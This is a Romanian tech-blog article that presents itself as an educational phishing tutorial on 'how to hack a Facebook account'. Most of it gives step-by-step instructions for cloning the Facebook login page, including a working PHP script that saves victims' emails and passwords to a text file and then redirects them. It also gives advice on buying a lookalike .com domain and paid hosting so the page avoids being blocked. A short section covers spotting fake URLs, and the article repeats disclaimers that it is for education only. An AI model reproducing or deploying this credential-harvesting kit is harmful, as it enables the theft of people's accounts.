Cum spargi un cont de facebook in 2019 (tutorial educativ)

Cum spargi un cont de facebook, aceasta este intrebarea mai multor oameni, ce folosesc aceasta platforma de socializare, multi nu intreaba neaparat pentru ca vor ei sa afle o parola facebook, ci pentru le-a fost spart contul, iar astazi vom vorbi despre acest lucru.

În primul rând, permiteți-mi să vă spun că acest articol este scris doar pentru educarea oamenilor despre modul în care funcționează phishingul și cum ar trebui să prevină înșelătorii de phishing. Vă rugăm să nu utilizați aceste tehnici în scopuri rău intenționate. Multumesc!

Ce este Phishingul?

Phishing-ul este cea mai populară tehnică folosită pentru hackingul de parole și pentru furtul informațiilor sensibile, cum ar fi cardurile de credit, numele de utilizator și parolele bancare etc.

Atacul de pescuit aka phishing este un proces de creare a unei copii duplicate sau a unei clone a unui site web de renume (precum facebook), în intenția de a fura parola utilizatorului sau alte informații sensibile, cum ar fi datele cardului de credit.

Este ușor pentru oricine care are puține cunoștințe tehnice să obțină o pagină de phishing și de aceea această metodă este atât de populară.

Cum spargi un cont de facebook

Înșelătorii de phishing îi determină pe utilizatori să introducă detalii sensibile pe o pagină web falsă (pagina de phishing) al cărei aspect este foarte identic cu paginile web legitime. În cele mai multe cazuri, singura diferență este adresa URL.

URL-ul poate fi, de asemenea, spoofed în unele cazuri, dacă site-ul web legitim este vulnerabil. Este dificil pentru un utilizator obișnuit să identifice pagina de escrocherii de phishing din cauza dispunerii sale de încredere.

Cum funcționează phishingul? – Cum spargi un cont de facebook

Hackerii / atacatorii vizează publicul larg și le trimit link-uri de phishing prin e-mail sau mesaj personal unde victima este invitată să facă clic pe un link. Utilizatorul / victima va trimisa către o pagină de phishing care se preface că este legitimă.

Persoanele obișnuite care nu consideră că este o pagina de phishing suspectă, vor introduce informațiile lor sensibile și toate informațiile vor fi trimise hackerului / atacatorului.

Aceasta este teoria, usor nu? Ei bine chiar este usor. Mai jos vom avea si un exemplu, un tutorial despre cum se poate aplica aceasta metoda iar victima poti fii chiar tu.

Cum spargi un cont de facebook

Crearea unei pagini care arată perfect ca pagina de conectare Facebook, dar introducerea ei într-un alt URL cum ar fi fakebook.com sau faecbook.com sau orice URL care se preface că este legitimă. Atunci când un utilizator aterizează pe o astfel de pagină, utilizatorul ar putea crede că aceasta este pagina de autentificare reală pe Facebook și le cere să le furnizeze numele de utilizator și parola.

Așadar, persoanele care nu consideră suspectă pagina de autentificare falsă ar putea introduce numele de utilizator si parola, informațiile si parola vor trimise hackerului / atacatorului care a creat pagina fake, în același timp victima va fi redirecționată către pagina inițială de Facebook.

Exemplu de viață reală: Dorel este un programator, el creează o pagină de conectare pe Facebook cu unele scripturi care să îi permită să obțină informațiile de utilizator și parolă și să o plaseze în https://www.facebouk.com/make-money-online-tricks.

Vasile este prieten cu Dorel. Dorel trimite un mesaj lui Vasile „Hei Vasile, am găsit o modalitate de a câștiga bani online cu ușurință, cu siguranță ar trebui să arunci o privire la acest https://www.facebouk.com/make-money-online-tricks”.

Vasile acceseaza link-ul și vede o pagină de conectare pe Facebook. Ca de obicei, Vasile introduce numele de utilizator și parola lui Facebook. Acum numele de utilizator și parola lui Vasile sunt trimise către Dorel. Vasile este redirecționat către o pagină de sfaturi pentru a face bani iar Vasile nu isi va da seama ca a avut loc o escrocherie pusa la cale de Dorel.

Cum să creați o pagină de Phishing în câteva minute?

  • Accesați Facebook.com, asigurați-vă că nu sunteți conectat la Facebook.
  • Apăsați Ctrl + U pentru a vizualiza codul sursă.
  • Copiați codul sursă și lipiți-l intr-un notepad.
  • Găsiți în cod atributul de acțiune al formularului de autentificare. Căutați cuvântul cheie „action” fără ghilimele apăsând Ctrl + F în blocul de notițe. În pagina de conectare Facebook, atributul de acțiune a fost completat cu URL-ul procesului de autentificare Facebook, înlocuiți-l cu process.php
  • Trebuie să găsiți numele câmpurilor de intrare folosind elementul inspect (Ctrl + Shft + I în Chrome)
  • Salvați acest fișier ca index.html
  • Acum trebuie să obțineți numele de utilizator și parola stocate într-un fișier text numit phishing.txt
  • Creați un fișier numit process.php folosind următorul cod.

Process.php

<? if(isset($_POST[’email’]) && isset($_POST[‘pass’])) { $password=file_get_contents(‘phishing.txt’);$phishing = fopen(“phishing.txt”,”w”); fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”\n”); fclose($file); echo ‘<script>window.location.href=”https://wwww.facebook.com/”</script>’; } else echo ‘<script>window.location.href=”index.html”</script>’; ?>

Cum să găzduiești pagina de phishing într-o adresă URL?

Pentru a pune pagina de phishing într-o adresă URL, trebuie să aveți două lucruri.

  1. Domeniu
  2. Web hosting

Obțineți un domeniu

Puteti face rost foarte usor de domeniu, de la aproape orice site web de gazduire, totusi trebuie sa tinem cont ca nu trebuie sa fie .ro, pentru ca acesta ar bate la ochi. Cel ami bun ar fi unul .com, exact asa cum foloseste si facebook.

Obțineți găzduire web

Aproape toate panourile gratuite de găzduire ar bloca paginile de phishing. Prin urmare trebuie sa tinem cont ca o mica investitie nu este rea, unele webhosturi iti ofera domeniu gratuit la gazduire, asa ca va recomand sa accesati Cel mai bun hosting si sa cumparati ce hosting vi se pare voua ca este bun. Gasiti si hosturi la un euro pe luna.

Cum te-ai putea proteja de escrocherie?

Hackerii vă pot contacta în mai multe moduri, cum ar fi e-mail, mesaje personale, mesaje Facebook, anunțuri pe site-uri etc. Dacă faceți clic pe orice link din aceste mesaje vă va duce la o pagină de conectare. Ori de câte ori găsiți un e-mail care vă trimite pe o pagină web, trebuie să notați un singur lucru, acesta este URL-ul, deoarece nimeni nu poate reproduce o adresa URL, cu excepția cazului în care există o vulnerabilitate XSS zero-day.

Care este adresa URL pe care o vedeți în bara de adrese a browserului? Este cu adevărat https://www.SITEADEVARAT.com? Există vreun simbol securizat de culoare verde (HTTPS) în bara de adrese? Puteți preveni hackingul amintind aceste întrebări. De asemenea, consultați exemplele de mai jos ale paginilor de phishing pe Facebook.

Pagini Phishing perfecte

Cum spargi un cont de facebook
Cum spargi un cont de facebook

Majoritatea oamenilor nu vor suspecta această pagină (prezentat mai sus), deoarece există un prefix https cu pictograma securizată a culorii verzi și nicio greșeală în www.facebook.com. Dar aceasta este o pagină de phishing cum? Verificați adresa URL. Este https://www.facebook.com.infoknown.com deci www.facebook.com este un subdomeniu al infoknown.com.

Google Chrome nu diferențiază subdomeniul și domeniul, spre deosebire de Firefox.Certificatele SSL (HTTPS) pot fi obținute de la mulți furnizori, puțini furnizori dau certificatul SSL gratuit timp de 1 an. Nu este mare lucru pentru un novice să creeze o pagină perfectă de phishing ca aceasta. Deci, aveți grijă.

Cum spargi un cont de facebook
Cum spargi un cont de facebook

Aceasta este o pagină normală de phishing pe Facebook, cu unele modificări în cuvântul Facebook.

Înșelătorii de phishing – Cum spargi un cont de facebook

Înșelătorii de tip phishing sunt încercări ale escrocherilor / hackerilor / infracțiunilor informatice de a vă păcăli să introduceți informațiile dvs. sensibile, cum ar fi numele de utilizator și parolele bancare pe internet, detaliile cardului de credit, etc.

Phishing Email

De cele mai multe ori înșelătorii de phishing se întâmplă prin e-mail. Hackerii pot trimite mesaje de pe adresa de e-mail a oricărui site web sau autoritate legitimă, astfel încât utilizatorii sunt convinși să creadă că e-mailul este trimis de pe un site web legitim.

Voi reveni in curand cu un articol despre cum ne putem proteja si de alte metode de spargere a unui cont Facebook. Pana atunci, tineti cont. ACEST ARTICOL ESTE UNUL EDUCATIV. NU INCURAJAM HACKINUL.

Articole recente

Cum să vezi parolele salvate în Chrome pentru Android

Dacă nu știai, atunci când folosești Chrome pentru Android, poți salva parolele introduse ca ulterior să le inserezi prin simpla apăsare a unui buton....

De acum vei putea raporta orice postare falsă sau dezinformatorie pe Instagram

Compania Facebook a anunțat că și-a extins programul de Third Party Fact-Checking pe Instagram asupra pozelor și videoclipurilor. În cadrul acestei modificări, utilizatorii platformei...

ZTE nubia Z20 un smartphone cu ecran pe spate foarte spectaculos

Nubia Z20 a fost lansat de catre compania ZTE iar acesta surprinde prin frumusetea lui, dar mai ales prin faptul ca se numara printre...

Apple Card serviciul despre care nu ai auzit si este foarte folositor

Apple a lansat un serviciu, Apple Card ce nu a fost lansat asa cum suntem obisnuiti, cu evenimente globale, totul a fost lansat, mai...

Cum să închizi sau restartezi Galaxy Note10/Note 10 Plus

Samsung și-a anunțat ultimele telefoane, Samsung Galaxy Note 10 și Note 10 Plus, în urmă cu câteva zile. Dacă intenționezi să îți cumperi oricare...

Comentarii recente

Alte articole

Leave A Reply

Please enter your comment!
Please enter your name here

Fii la zi! Abonează-te la newsletter!